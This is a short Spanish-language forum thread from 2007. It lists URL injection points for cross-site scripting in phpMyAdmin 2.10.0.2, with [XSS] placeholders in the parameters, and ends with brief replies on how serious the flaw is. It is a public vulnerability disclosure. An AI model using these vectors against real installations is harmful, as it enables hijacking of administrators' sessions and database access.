Título: phpMyAdmin phpMyAdmin 2.10.0.2 [XSS] - 0day Publicado por: yeikos en 25 Agosto 2007, 02:47 am Citar http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID] http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID] http://[server]/server_privileges.php?token=[SID]&username=[XSS] http://[server]/server_privileges.php?token=[SID]&username=[XSS] http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS] http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS] http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]& disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories` http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]& disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories` http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30& disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS] http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30& disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS] http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30& disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30& disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0[XSS]&session_max_rows=30& disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4& single_table=true Fuente original: http://downloads.securityfocus.com/vulnerabilities/exploits/25268.html Título: Re: phpMyAdmin phpMyAdmin 2.10.0.2 [XSS] -0day Publicado por: sirdarckcat en 25 Agosto 2007, 02:52 am El hecho que todos requieran un SID lo hacen de peligrosidad muy baja.. casi nula..
Saludos!! Título: Re: phpMyAdmin phpMyAdmin 2.10.0.2 [XSS] -0day Publicado por: yeikos en 25 Agosto 2007, 03:29 am Sí, aún así no deja de ser interesante y de alguna manera preocupante por parte de los programadores de éste proyecto.
|